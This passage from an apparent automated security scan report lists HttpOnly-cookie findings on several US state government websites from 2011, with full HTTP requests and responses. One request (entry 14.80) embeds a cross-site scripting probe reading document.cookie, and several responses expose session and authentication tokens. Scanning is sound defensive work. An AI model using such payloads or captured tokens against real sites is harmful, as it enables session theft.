<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml
...[SNIP]...

14.74. http://nd.gov/category.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://nd.gov
Path:   /category.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /category.htm HTTP/1.1
Host: nd.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=000040mTeXKHdQT74O2FGxzfyE0:13c99hdof; __utmz=47732216.1304161974.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=47732216.481745062.1304161974.1304161974.1304161974.1; __utmc=47732216; __utmb=47732216.1.10.1304161974;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:23:28 GMT
Server: IBM_HTTP_Server
Expires: Sat, 25 Dec 1993 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Content-Length: 11430
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: JSESSIONID=0000S2bhILL-vNlCr6ukkTMtuB5:13c99hdof; Path=/
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang=
...[SNIP]...

14.75. http://nd.gov/content.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://nd.gov
Path:   /content.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content.htm HTTP/1.1
Host: nd.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=000040mTeXKHdQT74O2FGxzfyE0:13c99hdof; __utmz=47732216.1304161974.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=47732216.481745062.1304161974.1304161974.1304161974.1; __utmc=47732216; __utmb=47732216.1.10.1304161974;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:23:28 GMT
Server: IBM_HTTP_Server
Expires: Sat, 25 Dec 1993 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Content-Length: 0
Content-Type: text/html
Content-Language: en-US
Set-Cookie: JSESSIONID=0000ymlAxnpqAff6nakNxnpDgm3:13c99hdof; Path=/
Connection: close


14.76. http://nd.gov/postcard.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://nd.gov
Path:   /postcard.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /postcard.htm HTTP/1.1
Host: nd.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=000040mTeXKHdQT74O2FGxzfyE0:13c99hdof; __utmz=47732216.1304161974.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=47732216.481745062.1304161974.1304161974.1304161974.1; __utmc=47732216; __utmb=47732216.1.10.1304161974;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:23:31 GMT
Server: IBM_HTTP_Server
Expires: Sat, 25 Dec 1993 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: JSESSIONID=0000lduBwy72J-ZY5YZrtmyn1Nf:13c99hdof; Path=/
Connection: close
Content-Length: 124629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" x
...[SNIP]...

14.77. https://nhlicenses.nh.gov/MyLicense%20Verification/Search.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://nhlicenses.nh.gov
Path:   /MyLicense%20Verification/Search.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /MyLicense%20Verification/Search.aspx?facility=Y HTTP/1.1
Host: nhlicenses.nh.gov
Connection: keep-alive
Referer: http://nhlicenses.nh.gov/home/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:40:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 18456
Set-Cookie: ASP.NET_SessionId=tcao3k454kf42v45gtkigvjl; path=/
Keep-Alive: timeout=3, max=100
Connection: Keep-Alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
   <head>
       <link rel="stylesheet" href="stylesheets/elicense2000.css">
           <title>Search</title>
   </head>
   <body>
   </body>
...[SNIP]...

14.78. https://njmvcscheduling.state.nj.us/tc/driverlogin.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://njmvcscheduling.state.nj.us
Path:   /tc/driverlogin.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tc/driverlogin.do HTTP/1.1
Host: njmvcscheduling.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 500 Internal Server Error
Date: Sat, 30 Apr 2011 12:23:49 GMT
Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8e
Set-Cookie: JSESSIONID=0000g2fKkgZ8he6Dg09OilhxQLU:-1;Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US

Error 500: Cannot find bean business_UserContext in scope session

14.79. http://nvsos.gov/index.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://nvsos.gov
Path:   /index.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.aspx HTTP/1.1
Host: nvsos.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:24:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=tfvm2dzu0tftezuzwaj0rg45; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 60406


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>Nevada Secretary of State : Home</title>
   <!-- Mimic Internet Explore
...[SNIP]...

14.80. https://onestop.michigan.gov/OneStop/a  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://onestop.michigan.gov
Path:   /OneStop/a

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /OneStop/a HTTP/1.1
Host: onestop.michigan.gov
Connection: keep-alive
Referer: https://onestop.michigan.gov/OneStop/ssoNeedPassword.do4c601--%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E687572642ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AMWEBJCT!%2Fonestop-main!JSESSIONID=00019ZIYB-FVRKrzIwI-8cI81wk:-D00MP

Response

HTTP/1.1 200 OK
content-length: 7389
content-type: text/html
date: Sat, 30 Apr 2011 12:27:42 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: WebSEAL/6.1.1.1 (Build 110202)
cache-control: no-cache
pragma: no-cache
Set-Cookie: PD-S-SESSION-ID-M=2_0_kUmUzvWxa29ffb+KB9WrHnipWl6pPoxQj6N-OyOoeWRBIG+E; Path=/; Secure

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html >
<head>
   <title>Michigan Business One Stop- Login</title>
   <link rel="stylesheet" type="text/css" href
...[SNIP]...

14.81. https://onestop.michigan.gov/OneStop/ssoNeedPassword.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://onestop.michigan.gov
Path:   /OneStop/ssoNeedPassword.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /OneStop/ssoNeedPassword.do HTTP/1.1
Host: onestop.michigan.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
connection: close
content-language: en-US
content-type: text/html;charset=ISO-8859-1
date: Sat, 30 Apr 2011 12:24:37 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
$wsep:
cache-control: no-cache="set-cookie, set-cookie2"
expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: AMWEBJCT!%2Fonestop-main!JSESSIONID=00013JITAtVTC4WOI90ULiuLFTx:-2MD9B7; Path=/

Error 400: Request[/ssoNeedPassword] does not contain handler parameter named dispatchCommand
<SCRIPT language="JavaScript">
<!--
document.cookie = "IV_JCT=%2Fonestop-main; path=/";
//-->
</SCRIPT>

14.82. https://onestop.michigan.gov/onestop-main/OneStop/ssoRegistration.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://onestop.michigan.gov
Path:   /onestop-main/OneStop/ssoRegistration.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onestop-main/OneStop/ssoRegistration.do HTTP/1.1
Host: onestop.michigan.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
connection: close
content-language: en-US
content-type: text/html;charset=ISO-8859-1
date: Sat, 30 Apr 2011 12:24:37 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
$wsep:
cache-control: no-cache="set-cookie, set-cookie2"
expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: AMWEBJCT!%2Fonestop-main!JSESSIONID=0001JbnVVmiOgauTlQhwEaf183v:-2MD9B7; Path=/

Error 400: Request[/ssoRegistration] does not contain handler parameter named dispatchCommand
<SCRIPT language="JavaScript">
<!--
document.cookie = "IV_JCT=%2Fonestop-main; path=/";
//-->
</SCRIPT>

14.83. http://pa.gov/portal/server.pt  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://pa.gov
Path:   /portal/server.pt

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/server.pt? HTTP/1.1
Host: pa.gov
Proxy-Connection: keep-alive
Referer: http://pa.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 29 Apr 2011 22:49:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://pa.gov/portal/server.pt/community/pa_gov/2966
Set-Cookie: ASP.NET_SessionId=mvfygx45fsxxezzmgxj43m55; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 385

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://pa.gov/portal/server.pt/community/pa_gov/2966">here</a>.</h2>
</body></html>
<!--Hostname: ENCTCISP274--><!-
...[SNIP]...

14.84. http://pa.gov/portal/server.pt/gateway/PTARGS_0_2_24662_0_51_43/http%3B/pubcontent.state.pa.us/publishedcontent/publish/cop_general_government_operations/pagov/branding/pagov_portal_header/images/temp/header_logo.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://pa.gov
Path:   /portal/server.pt/gateway/PTARGS_0_2_24662_0_51_43/http%3B/pubcontent.state.pa.us/publishedcontent/publish/cop_general_government_operations/pagov/branding/pagov_portal_header/images/temp/header_logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/server.pt/gateway/PTARGS_0_2_24662_0_51_43/http%3B/pubcontent.state.pa.us/publishedcontent/publish/cop_general_government_operations/pagov/branding/pagov_portal_header/images/temp/header_logo.gif HTTP/1.1
Host: pa.gov
Proxy-Connection: keep-alive
Referer: http://pa.gov/portal/server.pt/gateway%2527/PTARGS_0_2_24662_2966_368351_43/http
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: plloginoccured=false; REQUESTURLBEFORESSO=

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:30:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Language: en
X-POWERED-BY: ASP.NET
Set-Cookie: ASP.NET_SessionId=0xgyhqerjwturpq35fevipy2; path=/
ETag: "ce24ece2ef5cb1:0"
Last-Modified: Mon, 07 Jun 2010 03:16:57 GMT
Cache-Control: private
Content-Type: image/gif
Content-Length: 1890

GIF89a..P.....6h....>~......Bh..........b..#O{...2\..Cq...Ru....r........@n.0b....p.........J. V....`........Pz.........................................................................................
...[SNIP]...

14.85. http://pa.gov/portal/server.pt/gateway/PTARGS_0_2_24662_0_51_43/http%3B/pubcontent.state.pa.us/publishedcontent/publish/cop_general_government_operations/pagov/branding/stylesheets/pagov.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://pa.gov
Path:   /portal/server.pt/gateway/PTARGS_0_2_24662_0_51_43/http%3B/pubcontent.state.pa.us/publishedcontent/publish/cop_general_government_operations/pagov/branding/stylesheets/pagov.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/server.pt/gateway/PTARGS_0_2_24662_0_51_43/http%3B/pubcontent.state.pa.us/publishedcontent/publish/cop_general_government_operations/pagov/branding/stylesheets/pagov.css HTTP/1.1
Host: pa.gov
Proxy-Connection: keep-alive
Referer: http://pa.gov/portal/server.pt/gateway%2527/PTARGS_0_2_24662_2966_368351_43/http
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: plloginoccured=false; REQUESTURLBEFORESSO=

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:30:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Language: en
X-POWERED-BY: ASP.NET
Set-Cookie: ASP.NET_SessionId=o2kknt45scvkojmccwgdx0rg; path=/
ETag: "f1f120d425a2c91:0"
Last-Modified: Wed, 11 Mar 2009 08:46:11 GMT
Cache-Control: private
Content-Type: text/css
Content-Length: 3925

body, td, th {
   font-family: Verdana, Arial, Helvetica, sans-serif;
   font-size: 12px;
   color: #333333;
   line-height: 18px;
}

.KeyList {
margin: 0 0;
list-style-image: url(http://pubcontent.s
...[SNIP]...

14.86. http://path.trackinglabs.com/c.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://path.trackinglabs.com
Path:   /c.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c.php HTTP/1.1
Host: path.trackinglabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sat, 30 Apr 2011 12:24:24 GMT
Content-Type: text/html
Connection: close
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: FCSESSID=2ltftm989p6el8thjjls9jmt43; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 0


14.87. https://portal.s4web.state.mn.us/psp/por91ssap/SELFSERVICE/ENTP/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://portal.s4web.state.mn.us
Path:   /psp/por91ssap/SELFSERVICE/ENTP/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /psp/por91ssap/SELFSERVICE/ENTP/ HTTP/1.1
Host: portal.s4web.state.mn.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PS_LOGINLIST=https://portal.s4web.state.mn.us/por91ssap; web2-80-PORTAL-PSJSESSIONID=K4yZN7vCLYHmSmZ61lt95PGKpxvt51Zd!-1405169941; https%3a%2f%2fportal.s4web.state.mn.us%2fpsp%2fpor91ssap%2fselfservice%2fentp%2frefresh=list:||; __utmz=205212754.1304161967.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PS_TOKENEXPIRE=30_Apr_2011_11:15:39_GMT; BIGipServerprodss-SWIFT_https=520792256.35867.0000; SignOnDefault=; __utma=205212754.145768528.1304161967.1304161967.1304161967.1; ExpirePage=https://portal.s4web.state.mn.us/psp/por91ssap/; __utmc=205212754; __utmb=205212754; PS_TOKEN=pwAAAAQDAgEBAAAAvAIAAAAAAAAsAAAABABTaGRyAk4AcQg4AC4AMQAwABRoxgm+6pefEQHwP4IRzFA21F6QGmcAAAAFAFNkYXRhW3icHYpLCoAwDAXHKi7Fi1T81M9WsLpShAouPYP383A+mpAZ8pIXyFKTJPJniFUGPDszjpObhdxzsFGcBFYuHuW6ttQ0ais7sZNtzCpNHzmIA5O2jlFf/KlQC+o=;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Connection: close
Date: Sat, 30 Apr 2011 12:24:44 GMT
Location: https://portal.s4web.state.mn.us/psp/por91ssap/SELFSERVICE/ENTP/h/?tab=MN_GUEST
Content-Type: text/html
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: web2-80-PORTAL-PSJSESSIONID=qYLRN71M4CpRL303GMjfv1kRpvmQvDhQ!-1405169941; path=/; HttpOnly=
Set-Cookie: https%3a%2f%2fportal.s4web.state.mn.us%2fpsp%2fpor91ssap%2fselfservice%2fentp%2frefresh=list:|||%3ftab%3dmn_guest; domain=.state.mn.us; expires=Saturday, 30-Apr-2011 12:44:44 GMT; path=/; secure
Set-Cookie: PS_TOKENEXPIRE=30_Apr_2011_12:24:44_GMT; domain=.state.mn.us; path=/; secure
Set-Cookie: SignOnDefault=; domain=.state.mn.us; path=/; secure
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 353

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://portal.s4web.state.mn.us/p
...[SNIP]...

14.88. https://portal.s4web.state.mn.us/psp/por91ssap/SELFSERVICE/ENTP/h/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://portal.s4web.state.mn.us
Path:   /psp/por91ssap/SELFSERVICE/ENTP/h/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /psp/por91ssap/SELFSERVICE/ENTP/h/?tab=MN_GUEST& HTTP/1.1
Host: portal.s4web.state.mn.us
Connection: keep-alive
Referer: http://www.state.mn.us/portal/mn/jsp/home.do?agency=NorthStar
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=205212754.145768528.1304161967.1304161967.1304161967.1; __utmb=205212754; __utmc=205212754; __utmz=205212754.1304161967.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); web2-80-PORTAL-PSJSESSIONID=FRMYN7vQyWCl2GvSTnjKccNL4TyQstPG!-1405169941; BIGipServerprodss-SWIFT_https=520792256.35867.0000

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Cache-Control: no-store
Connection: close
Date: Sat, 30 Apr 2011 11:17:50 GMT
Location: https://portal.s4web.state.mn.us/psp/por91ssap/SELFSERVICE/ENTP/h/?tab=MN_GUEST
Content-Type: text/html
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: web2-80-PORTAL-PSJSESSIONID=F2dNN7vpBYLspdSKYyfMGvL3QlThTrNg!-1405169941; path=/; HttpOnly=
Set-Cookie: https%3a%2f%2fportal.s4web.state.mn.us%2fpsp%2fpor91ssap%2fselfservice%2fentp%2frefresh=list: %3ftab%3dmn_guest; domain=.state.mn.us; expires=Saturday, 30-Apr-2011 11:37:50 GMT; path=/; secure
Set-Cookie: ExpirePage=https://portal.s4web.state.mn.us/psp/por91ssap/; domain=.state.mn.us; path=/; secure
Set-Cookie: PS_LOGINLIST=https://portal.s4web.state.mn.us/por91ssap; domain=.state.mn.us; path=/; secure
Set-Cookie: PS_TOKENEXPIRE=30_Apr_2011_11:17:50_GMT; domain=.state.mn.us; path=/; secure
Set-Cookie: PS_TOKEN=pgAAAAQDAgEBAAAAvAIAAAAAAAAsAAAABABTaGRyAk4AcQg4AC4AMQAwABQCDU5YTa3H7AOgmr8ND8Tx8IqdoWYAAAAFAFNkYXRhWnicHYlJCoAwEATLBY/iRyIajXoVXE5KIIJH3+D/fJxNZpiqofsF8ixNEvlLiVMFVg5mejw3C8XKyU7pCWxcPMrVWhparZF7sZNNzGrdKDqsODDpc5H8qZwL8A==; domain=.state.mn.us; path=/; secure
Set-Cookie: SignOnDefault=; domain=.state.mn.us; path=/; secure
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 353

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://portal.s4web.state.mn.us/p
...[SNIP]...

14.89. https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/amserver/UI/Login  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://portal01.state.nj.us
Path:   /http:/portal20.sa.state.nj.us:8080/amserver/UI/Login

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /http:/portal20.sa.state.nj.us:8080/amserver/UI/Login HTTP/1.1
Host: portal01.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 30 Apr 2011 12:24:49 GMT
Content-type: text/html;charset=UTF-8
Cache-control: private
Expires: 0
X-dsameversion: 7 2005Q4 patch 120954-12
Am_client_type: genericHTML
Set-Cookie: %2Fportal20.sa.state.nj.us_JSESSIONID=B1981083223B49AAF8B9D753FAD991EB|portal20.sa.state.nj.us|/|iplanet; domain=.state.nj.us; path=/
Set-Cookie: %2F.state.nj.us_AMAuthCookie=AQIC5wM2LY4Sfcx9UjpVfeUFx19Ud%252FeRI7S2%252FxpJgtc3zKY%253D%2540AAJTSQACMDE%253D%2523|.state.nj.us|/|iplanet; domain=.state.nj.us; path=/
Set-Cookie: %2F.state.nj.us_amlbcookie=01|.state.nj.us|/|iplanet; domain=.state.nj.us; path=/
Content-Length: 6736
Connection: close


<html>


<head>
<title>Log On To myNewJersey</title>


<link rel="stylesheet" href="https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/oit/styles/mynj3.css" type="text/css">
<
...[SNIP]...

14.90. http://puco.ohio.gov/Puco/Utilities/OneStop.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://puco.ohio.gov
Path:   /Puco/Utilities/OneStop.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Puco/Utilities/OneStop.cfm HTTP/1.1
Host: puco.ohio.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Sat, 30 Apr 2011 12:24:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=2644861;expires=Mon, 22-Apr-2041 12:24:50 GMT;path=/
Set-Cookie: CFTOKEN=744536ab74561ac0-7FBAC69C-C600-7EF1-8AC5B585F1EAADF3;expires=Mon, 22-Apr-2041 12:24:50 GMT;path=/
Set-Cookie: JSESSIONID=84306a384fe461289cb65933251b16472174;path=/
Content-Type: text/html; charset=UTF-8


                                                                                                       <!-- tried to redirect -->


<html>
<head>
<title>File Not Found</title>
</head>
<body>


    <h1>404, File Not Found</h1>

...[SNIP]...

14.91. http://puco.ohio.gov/puco/forms/form.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://puco.ohio.gov
Path:   /puco/forms/form.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /puco/forms/form.cfm HTTP/1.1
Host: puco.ohio.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 30 Apr 2011 12:24:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=2644859;expires=Mon, 22-Apr-2041 12:24:50 GMT;path=/
Set-Cookie: CFTOKEN=20d6b268cf6ef6f8-7FBAB8E0-F8E2-E435-2A76941BDE072C98;expires=Mon, 22-Apr-2041 12:24:50 GMT;path=/
Set-Cookie: JSESSIONID=843045bf9dd5aa09bca337a766850107d1d1;path=/
Location: http://www.puco.ohio.gov/puco/index.cfm/puco-forms/
Content-Type: text/html; charset=UTF-8


                                                                                                                               

14.92. http://regulatorystaff.sc.gov/orsContent.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://regulatorystaff.sc.gov
Path:   /orsContent.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /orsContent.asp HTTP/1.1
Host: regulatorystaff.sc.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:24:51 GMT
Content-Type: text/html
